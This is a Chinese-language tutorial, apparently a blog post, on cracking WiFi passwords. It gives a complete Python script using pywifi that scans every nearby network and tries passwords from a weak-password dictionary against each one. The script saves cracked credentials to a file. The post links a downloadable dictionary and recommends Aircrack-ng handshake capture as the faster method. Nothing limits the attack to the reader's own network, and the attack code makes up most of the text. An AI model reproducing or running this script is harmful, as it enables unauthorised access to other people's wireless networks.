前提建议:

     本文提到的爆破方式其实效率很低(因为每次都要重连wifi), 可以拿来做简单破解, 比如自己写个密码字典: 八个6,六个8,1到8...之类的几十个简单密码. 然后跑这个脚本.
     如果追求高效爆破. 建议使用Aircrack-ng, 它是通过抓wifi连接数据包, 然后爆破抓到的包数据....抓到连接包之后的工作全部是本地运行, 只要不心疼电脑, 破解速度比这个脚本快了无数倍.

关键点:
1. wifi密码错误后可以无限重试.
2. 我们需要一堆密码去自动尝试, 如果这堆密码试不出来, 那就无法破解

准备材料:

1. 一个密码字典
   [比如下面是我用的两千多个弱密码]
   链接：https://pan.baidu.com/s/1DeMALLnwCe_yFJI-C-ys9Q 密码：aj4x
   你可以按照自己需求增删字典数据.
2. 新建如下文件: [可以改下代码自动生成这些文件]
   avail_nearby_wifis.txt , already_tried_passwords.txt

代码

#-*- coding:utf8 -*-

import time
import pywifi
from pywifi import const

#单个密码测试延迟, 超过说明连接太慢,放弃使用
testtimes = 15
#结果文件保存路径
save_files = "avail_nearby_wifis.txt"

passwords = [x.strip("\n") for x in open("weak_passwords.txt","r").readlines()]
already_knows = [x.strip("\n").split("--")[0] for x in open(save_files,"r").readlines()]
already_tried = [x.strip("\n") for x in open("already_tried_passwords.txt","r").readlines()]
def main():
    wifi = pywifi.PyWiFi()
    #选择定一个网卡并赋值于iface
    iface = wifi.interfaces()[0]
    #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
    scanres = scans(iface)
    nums = len(scanres)
    print("附近wifi个数:"+str(nums))
    for i,x in enumerate(scanres):
        res = test_wifi(nums-i,iface,x,passwords,testtimes)
        if res:
            print("=====================================================================")
            print("找到密码:"+res)
            with open(save_files, "a") as f:
                f.write(res+"\n")
            print("=====================================================================")

def scans(face):
    #开始扫描
    face.scan()
    time.sleep(3)
    #在3秒后获取扫描结果
    return face.scan_results()

def test_wifi(i,face,x,key,ts):
    #显示对应网络名称，考虑到部分中文名啧显示bssid
    wifi_name = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid
    if wifi_name in already_knows:
        print(str(wifi_name)+"--密码已知")
        return False
    print("尝试连接wifi:"+str(wifi_name))
    #迭代字典并进行爆破
    total_key = len(key)
    for n,password in enumerate(key):
        if wifi_name+"--"+password in already_tried:
            print("密码试过了...")
            continue
        with open("already_tried_passwords.txt","a") as f:
            f.write(wifi_name+"--"+password+"\n")
        already_tried.append(wifi_name+"--"+password)

        print("尝试密码:"+str(password)+" -- "+str(n)+"/"+str(total_key))
        profile = pywifi.Profile()
        profile.ssid = wifi_name
        profile.auth = const.AUTH_ALG_OPEN
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        profile.cipher = const.CIPHER_TYPE_CCMP
        profile.key = password
        #移除所有热点配置
        face.remove_all_network_profiles()
        tmp_profile = face.add_network_profile(profile)
        face.connect(tmp_profile)
        #初始化状态码，考虑到用0会发生些逻辑错误
        code = 10
        t1 = time.time()
        #循环刷新状态，如果置为0则密码错误，如超时则进行下一个
        while code!=0 :
            time.sleep(0.1)
            code = face.status()
            now = time.time()-t1
            if now>ts:
                break
            if code == 4:
                face.disconnect()
                return str(wifi_name)+"--"+str(password)
    return False

if __name__ == '__main__':
    main()